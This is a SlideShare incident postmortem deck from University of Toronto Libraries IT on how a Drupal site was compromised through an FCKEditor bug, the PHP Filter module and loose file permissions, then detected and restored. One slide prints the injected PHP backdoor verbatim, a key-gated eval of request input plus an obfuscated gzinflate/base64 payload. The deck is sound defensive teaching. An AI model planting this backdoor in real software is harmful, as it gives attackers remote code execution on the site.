SlideShare uma empresa Scribd logo

Anatomy of a Drupal Hack - TechKnowFile 2014

Transferir como PPTX, PDF
University of Toronto Libraries - Information Technology Services
University of Toronto Libraries - Information Technology Services
Tecnologia
1 de 39
Anatomy of a Drupal Hack Graham Stewart Network and Storage Services Manager Bilal Khalid Senior Application Developer University of Toronto Libraries
ITS at University of Toronto Libraries => wide range of services and resources in support of the Library’s role in supporting the research, teaching and learning mission of the university and its community. => develop and maintain digital collections and web-based resources => upward of 100 web sites, > 200 servers, ~1 PB storage, 56M visits to sites in FY 2012 Photo: Gordon Belray
Photo: Gordon Belray
Photo: Gordon Belray
Photo: Gordon Belray
Not just hardware ... Collaborative environment between: - programmers / developers / designers - librarians - sysadmins / operations Technology environment: - open source tools - Linux (Ubuntu, Redhat), KVM
… and we’re hiring !
Drupal @UTL
Application and caching Database Load balancing Storage or rsync IP HAProxy / Keepalived HAProxy / Keepalived IP Memcached/ Keepalived Memcached/ Keepalived IPMySQL MySQL User Varnish APC Apach e & PHP Varnish APC Apach e & PHP Varnish APC Apach e & PHP Varnish APC Apach e & PHP
February 14, 2013
12:10 “Armorial is down!”
12:18 “Update: Armorial down for 1.5 hours, server side issue? maybe caching?”
Symptom or root problem? Chef ? MySQL error? Restart Apache? Restart server? Recent OS updates? PHP versions? Drupal Customizations? Anything updated in Drupal? Hacked !?#%$&!
Detection - apache log analysis - looked for odd traffic patterns - in particular, isolated all wp-conf requests - “hack” attempt started a couple of weeks before - successful injection occurred the day before
Exploit... FCKEditor Bug - allows XSS attacks Sources: https://drupal.org/node/1482528 http://webcache.googleusercontent.com/search?q=cache:http://exploitsdownload .com/exploit/na/drupal-fckeditorckeditor-php-execution
… + PHP Execution... PHP Filter Module - core module that allows ‘client’ PHP execution - disabled by default
… + Permission issues... Incorrect rwx permissions for sites/default/files - allowed user uploaded files to be executable by www- data - www-data also had write permissions to /var/www!
… = Code Injection Snippet found inserted at the top of random PHP files throughout the site: if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'edd1d65d726121336405c4d2554df925') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); } eval(gzinflate(base64_decode('y0zTyCwuTi3RUIkPcg0MdQ0OiVZPzlCP1VRQU1 PQyE0xxZSwtVVQT01JMUwxM00xNzIzNDI0NjYzMTBNNkkxMjU1SUmzNDJVB+ vHMLkgoyA+OT8lFWiMpkK1QmpZYg4OaWuF1IrMEg0gXQsA'))); Reversing gzinflate:
Snooping Utility
Risk Exposure - hijack/deface site - ransomware => blackmail - host their own content - execute phishing attacks - gain access to other sites on server (if any) - exploit OS vulnerabilities
Risk Exposure - use Drupal’s settings.php to gain access to the database/salt - harvest public/private site content - access personal user information (including passwords!!) - access other dbs/sites if they use the same credentials
The Recovery - Restoration - restored site from a couple of days prior - all servers are backed up nightly (incl. files and db) - at most 48 hours of data loss - correct file-system permissions - disabled FCKEditor, PHP Filter modules - reset Drupal admin password - changed all site users’ passwords
The Recovery - Communication - contacted all potentially affected site members - clear, honest communication - possibility of personal information being leaked - possibility passwords might have been compromised - do users use same passwords for other services?
Lessons Learned - Drupal - first real Drupal problem - follow Drupal security guidelines! - https://drupal.org/security/secure-configuration - vet the required core, contrib and custom modules for project - stay on top of the updates - test patches and updates and implement rapidly - use https for all secure pages (whenever possible) - install security modules - Security Review, Security Kit, Login Security, ... - if developing, use Drupal’s built-in checking functions
Lessons Learned - Operational - review site security policies - enforcement: periodic security sweeps - tight control on production environments - protect the core code with version control - use https whenever authentication is involved - mod_security to block attacks - establish security analysis practices - metrics - traffic analysis - log triggers and notifications
Embrace Failure - Failure rarely has a single cause: - systems are very complex, many interdependencies - answers are not necessarily obvious - weakness can be latent, triggered by other flaws - red herrings - swiss cheese
Source: John Allspaw: Advanced PostMortem Fu and Human Error 101 http://www.slideshare.net/jallspaw/advanced-postmortem-fu-and-human-error-101- velocity-2011
Lessons Learned - Cultural - Everyone must have the organization’s end goals in mind - Team of experts or team of poly-skilled polyglots? - Emergency roles may differ from normal roles - Emergency communication channels must be defined - Failure rehearsals: deliberately break things: - The culture must be free of blame
Further Information https://drupal.org/security/secure-configuration https://drupal.org/writing-secure-code http://www.cameronandwilding.com/blog/pablo/10-most-critical- drupal-security-risks http://www.slideshare.net/jallspaw/advanced-postmortem-fu-and- human-error-101-velocity-2011 http://www.kitchensoap.com/ http://arstechnica.com/information-technology/2012/07/netflix- attacks-own-network-with-chaos-monkey-and-now-you-can-too/
Questions? Thank You

Recomendados

Building A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerBuilding A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerXavier Mertens
 
Drupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupDrupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupChris Hales
 
A Drush Primer - DrupalCamp Chattanooga 2013
A Drush Primer - DrupalCamp Chattanooga 2013A Drush Primer - DrupalCamp Chattanooga 2013
A Drush Primer - DrupalCamp Chattanooga 2013Chris Hales
 
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...DevOps_Fest
 
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧Orange Tsai
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...DoktorMandrake
 
Html5 drupal7 with mandakini kumari(1)
Html5 drupal7 with mandakini kumari(1)Html5 drupal7 with mandakini kumari(1)
Html5 drupal7 with mandakini kumari(1)Mandakini Kumari
 
Hadoop Installation
Hadoop InstallationHadoop Installation
Hadoop InstallationAhmed Salman
 

Recomendados

Building A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerBuilding A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerXavier Mertens
 
Drupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupDrupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupChris Hales
 
A Drush Primer - DrupalCamp Chattanooga 2013
A Drush Primer - DrupalCamp Chattanooga 2013A Drush Primer - DrupalCamp Chattanooga 2013
A Drush Primer - DrupalCamp Chattanooga 2013Chris Hales
 
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...DevOps_Fest
 
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧Orange Tsai
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...DoktorMandrake
 
Html5 drupal7 with mandakini kumari(1)
Html5 drupal7 with mandakini kumari(1)Html5 drupal7 with mandakini kumari(1)
Html5 drupal7 with mandakini kumari(1)Mandakini Kumari
 
Hadoop Installation
Hadoop InstallationHadoop Installation
Hadoop InstallationAhmed Salman
 
Large Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and FriendsLarge Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and Friendslucenerevolution
 
Apache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exerciseApache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exerciseShiva Rama Krishna Dasharathi
 
2016 03 15_biological_databases_part4
2016 03 15_biological_databases_part42016 03 15_biological_databases_part4
2016 03 15_biological_databases_part4Prof. Wim Van Criekinge
 
Friends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFSFriends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFSSaumitra Srivastav
 
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...PROIDEA
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Install hadoop in a cluster
Install hadoop in a clusterInstall hadoop in a cluster
Install hadoop in a clusterXuhong Zhang
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
 
Web scraping with nutch solr
Web scraping with nutch solrWeb scraping with nutch solr
Web scraping with nutch solrMike Frampton
 
Elasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupElasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupBharvi Dixit
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Securityn|u - The Open Security Community
 
Java Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning TalkJava Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning TalkJosef Cacek
 
HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)Chris Casano
 
Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014Josef Cacek
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
Firebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfmFirebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfmqqlan
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET websitePositive Hack Days
 
Environment for training models
Environment for training modelsEnvironment for training models
Environment for training modelsFlyElephant
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014Greg Foss
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 

Mais conteúdo relacionado

Mais procurados

Large Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and FriendsLarge Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and Friendslucenerevolution
 
Apache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exerciseApache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exerciseShiva Rama Krishna Dasharathi
 
Friends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFSFriends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFSSaumitra Srivastav
 
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...PROIDEA
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Install hadoop in a cluster
Install hadoop in a clusterInstall hadoop in a cluster
Install hadoop in a clusterXuhong Zhang
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
 
Web scraping with nutch solr
Web scraping with nutch solrWeb scraping with nutch solr
Web scraping with nutch solrMike Frampton
 
Elasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupElasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupBharvi Dixit
 
Java Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning TalkJava Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning TalkJosef Cacek
 
HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)Chris Casano
 
Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014Josef Cacek
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
Firebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfmFirebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfmqqlan
 

Mais procurados (17)

Large Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and FriendsLarge Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and Friends
 
Apache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exerciseApache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exercise
 
2016 03 15_biological_databases_part4
2016 03 15_biological_databases_part42016 03 15_biological_databases_part4
2016 03 15_biological_databases_part4
 
Friends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFSFriends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFS
 
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Install hadoop in a cluster
Install hadoop in a clusterInstall hadoop in a cluster
Install hadoop in a cluster
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 
Web scraping with nutch solr
Web scraping with nutch solrWeb scraping with nutch solr
Web scraping with nutch solr
 
Elasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupElasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetup
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
Java Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning TalkJava Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning Talk
 
HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)
 
Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
 
Firebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfmFirebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfm
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
 

Semelhante a Anatomy of a Drupal Hack - TechKnowFile 2014

Environment for training models
Environment for training modelsEnvironment for training models
Environment for training modelsFlyElephant
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014Greg Foss
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Operating Docker
Operating DockerOperating Docker
Operating DockerJen Andre
 
Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaGábor Hojtsy
 
Drupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, ScalingDrupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, Scalingsmattoon
 
Pragmatic Pipeline Security
Pragmatic Pipeline SecurityPragmatic Pipeline Security
Pragmatic Pipeline SecurityJames Wickett
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...APNIC
 
Continuous Security
Continuous SecurityContinuous Security
Continuous SecuritySysdig
 
Drupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from SunDrupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from Sunsmattoon
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
VB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkVB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkAmr Thabet
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's EncryptWalter Ebert
 
Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security rightGábor Hojtsy
 
Doing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonDoing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonGábor Hojtsy
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentSteven Van den Hout
 

Semelhante a Anatomy of a Drupal Hack - TechKnowFile 2014 (20)

Environment for training models
Environment for training modelsEnvironment for training models
Environment for training models
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Operating Docker
Operating DockerOperating Docker
Operating Docker
 
Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp Bratislava
 
Drupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, ScalingDrupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, Scaling
 
Pragmatic Pipeline Security
Pragmatic Pipeline SecurityPragmatic Pipeline Security
Pragmatic Pipeline Security
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
 
Continuous Security
Continuous SecurityContinuous Security
Continuous Security
 
Drupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from SunDrupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from Sun
 
Web application security
Web application securityWeb application security
Web application security
 
Secure your site
Secure your siteSecure your site
Secure your site
 
Web Security... Level Up
Web Security... Level UpWeb Security... Level Up
Web Security... Level Up
 
VB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkVB2013 - Security Research and Development Framework
VB2013 - Security Research and Development Framework
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's Encrypt
 
Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security right
 
Doing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonDoing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon London
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
 

Mais de University of Toronto Libraries - Information Technology Services

Mais de University of Toronto Libraries - Information Technology Services (20)

ReEnvisioning E-Resource Holdings Management
ReEnvisioning E-Resource Holdings ManagementReEnvisioning E-Resource Holdings Management
ReEnvisioning E-Resource Holdings Management
 
Using Islandora Multi-sites to Sustain Faculty Digital Humanities Projects
Using Islandora Multi-sites to Sustain Faculty Digital Humanities ProjectsUsing Islandora Multi-sites to Sustain Faculty Digital Humanities Projects
Using Islandora Multi-sites to Sustain Faculty Digital Humanities Projects
 
Measure twice, cut once: Taking the time for user research in your redesign (...
Measure twice, cut once: Taking the time for user research in your redesign (...Measure twice, cut once: Taking the time for user research in your redesign (...
Measure twice, cut once: Taking the time for user research in your redesign (...
 
The Ontario library research cloud
The Ontario library research cloudThe Ontario library research cloud
The Ontario library research cloud
 
Digital preservation policy for humans
Digital preservation policy for humansDigital preservation policy for humans
Digital preservation policy for humans
 
Islandora and Omeka: Building U of T Digital Collections & Exhibits
Islandora and Omeka: Building U of T Digital Collections & ExhibitsIslandora and Omeka: Building U of T Digital Collections & Exhibits
Islandora and Omeka: Building U of T Digital Collections & Exhibits
 
Adding e-resources license information to library systems: three libraries’ a...
Adding e-resources license information to library systems: three libraries’ a...Adding e-resources license information to library systems: three libraries’ a...
Adding e-resources license information to library systems: three libraries’ a...
 
Collections UofT - TRY 2014
Collections UofT - TRY 2014Collections UofT - TRY 2014
Collections UofT - TRY 2014
 
Opportunities and Challenges Using Open Source Software in Academic Libraries...
Opportunities and Challenges Using Open Source Software in Academic Libraries...Opportunities and Challenges Using Open Source Software in Academic Libraries...
Opportunities and Challenges Using Open Source Software in Academic Libraries...
 
Accessibility Information Toolkit for Libraries - TRY 2014
Accessibility Information Toolkit for Libraries - TRY 2014Accessibility Information Toolkit for Libraries - TRY 2014
Accessibility Information Toolkit for Libraries - TRY 2014
 
Sustaining Continuous Digital Project Development with Team Project Managemen...
Sustaining Continuous Digital Project Development with Team Project Managemen...Sustaining Continuous Digital Project Development with Team Project Managemen...
Sustaining Continuous Digital Project Development with Team Project Managemen...
 
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
 
Communicating Changes in Digital Services
Communicating Changes in Digital Services Communicating Changes in Digital Services
Communicating Changes in Digital Services
 
Why schema.org?
Why schema.org?Why schema.org?
Why schema.org?
 
Library Linked Data and the Future of Bibliographic Control
Library Linked Data and the Future of Bibliographic ControlLibrary Linked Data and the Future of Bibliographic Control
Library Linked Data and the Future of Bibliographic Control
 
Introduction to the Semantic Web
Introduction to the Semantic WebIntroduction to the Semantic Web
Introduction to the Semantic Web
 
Brave New eWorld: Struggles and Solutions
Brave New eWorld: Struggles and SolutionsBrave New eWorld: Struggles and Solutions
Brave New eWorld: Struggles and Solutions
 
Responsive Web Design at University of Toronto Libraries
Responsive Web Design at University of Toronto LibrariesResponsive Web Design at University of Toronto Libraries
Responsive Web Design at University of Toronto Libraries
 
My Media at University of Toronto Libraries
My Media at University of Toronto LibrariesMy Media at University of Toronto Libraries
My Media at University of Toronto Libraries
 
Digital Signage at University of Toronto Libraries
Digital Signage at University of Toronto LibrariesDigital Signage at University of Toronto Libraries
Digital Signage at University of Toronto Libraries
 

Último

#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Install Stable Diffusion in windows machine
